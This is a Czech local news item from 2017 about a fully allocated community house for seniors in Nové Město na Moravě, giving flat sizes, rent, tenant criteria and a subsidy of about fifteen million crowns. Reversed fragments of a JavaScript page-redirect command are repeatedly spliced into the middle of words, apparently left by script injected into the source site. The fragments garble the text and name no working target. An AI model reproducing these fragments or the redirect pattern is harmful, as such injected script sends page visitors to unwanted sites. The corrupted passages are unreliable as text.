Rainbow page separator

Noví nájemníci netrpělivě čekají na dostavění komunitního domu

Sobota, 17. června 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Právě budovaný komunitní dům pro soběstačné seniory ve Žďárské ulici je už plný. Všech 22 bytů je obsazeno, komise vybírala z celkem čtyřiatřiceti podaných přihlášek. Byty v komunitním domě o velikostech 1+kk o ploše 41 m² a 2+kk o rozměru 45 m² jsou určeny pro lidi z Nového Města a okolí ve věku od 60 let a se stanoveným měsíčním příjmem, přičemž nájemník nesmí vlastnit žádnou nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost. Nájemné bylo vyčísleno na 57 korun za metr čtvereční obytné plochy, nájemní smlouva je na dva roky, poté může být au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomaticky prodloužena.
Podmínky pro výběr nájemníků se odvíjely od kritérií dotačního programu, díky němuž novoměstská radnice na stavbu domu získala finanční podporu ve výši zhruba patnáct milionů korun.
Bezbariérová budova s byty a společnými pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torami, navíc doplněná odpočinkovým parkem, která má být zkolaudována v říjnu, přivítá první nájemníky koncem le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku.